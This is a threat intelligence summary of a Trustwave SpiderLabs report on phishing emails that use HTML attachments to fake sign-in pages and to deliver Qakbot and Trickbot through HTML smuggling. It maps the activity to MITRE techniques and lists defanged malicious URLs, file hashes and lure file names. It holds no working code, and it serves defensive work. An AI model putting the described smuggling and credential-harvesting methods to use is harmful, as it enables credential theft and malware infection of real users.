Trustwave SpiderLabs observes HTML file attachments being used prominently in phishing spam, with HTML/HTM collectively accounting for about 14.09% of attachments, second only to EXE files. The report describes how these HTML attachments mimic sign-in pages and, in some cases, use HTML smuggling to deliver malware such as Qakbot and Trickbot, often leveraging obfuscated JavaScript and remote scripts to exfiltrate data. #Qakbot #Trickbot #HTMLSmuggling #DEV-0238 #DEV-0253 #DEV-0193
Keypoints
- HTML and HTM attachments are a notable portion of spam, totaling 14.09% of attachments, following EXE files in prevalence.
- Phishing HTML attachments typically imitate sign-in pages for services like Microsoft, Google, or online banking to steal credentials.
- Threat actors DEV-0238 and DEV-0253 use HTML attachments with HTML smuggling to deliver keyloggers; DEV-0193 is linked to Trickbot via HTML smuggling.
- Phishing HTML files are usually benign themselves, but the embedded forms prompt victims to submit credentials, enabling credential theft.
- Adversaries use code obfuscation and pull JavaScript/CSS from remote servers, including legitimate CDNs, to handle form actions and data exfiltration.
- HTML smuggling delivers malware by placing a binary in a data blob that decodes in the browser and prompts the user to save and run the file.
- Obfuscation is common, making email gateway detection harder; social engineering compounds the effectiveness of these attacks.
MITRE Techniques
- [T1566] Phishing β HTML attachments mimic sign-in pages to steal credentials. βThe HTML file attachments mimic the sign-in page for services like Microsoft, Google or online banking pages and the danger is when a user falls for the scam, enters their credentials into the form, and submits it.β
- [T1204] User Execution β The user is deceived into saving/running a downloaded binary after a download bar appears. βA download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it.β
- [T1105] Ingress Tool Transfer β Remote JavaScript/CSS/assets are pulled from actor-controlled servers to enable payload handling and exfiltration. βUsually, the JavaScript that handles the data exfiltration is hosted by the actorβs web server (or operated by them).β
- [T1027] Obfuscated/Compressed Files and Information β JavaScript is obfuscated to evade detection; βJavaScript codes are usually obfuscated with open-source tools like JavaScript Obfuscator.β
Indicators of Compromise
- [URLs] context β hxxps://valdia[.]quatiappcn[.]pw, hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/435d220bee10a57b635805e70b50fd90nbr1657558944[.]css, hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/2a4e8eea72f5947287e793a9b9355d9fnbr1657558944[.]css
- [Hashes] context β 8ac0f6c2c31934801c4c6ae5606997b5c84a59290287059ec8ea68754921899a (SHA256), e1c7c9ba81d2c8bd09b1cdc25ccb44e6763f8906486c5298c40efcb2133ad017 (SHA256), Cecfabcc1b8f0467a0f646d0a75bd3a94e71c1a2ca41380b75f3a60e7827d2b9 (SHA256), 1cbc3422305b203bba574a0d59263e377c61a198f229430131570045c59a3521 (SHA256)
- [File name] context β ScannedDocuments_9720709.html.zip, ScannedDocuments_9720709.html, and ScannedDocuments_9720709.img